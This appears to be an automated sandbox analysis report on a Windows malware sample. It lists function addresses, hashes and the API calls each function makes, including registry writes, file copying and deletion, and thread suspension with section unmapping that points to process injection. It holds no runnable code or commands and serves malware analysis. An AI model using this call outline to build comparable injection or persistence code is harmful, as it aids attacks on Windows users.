  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
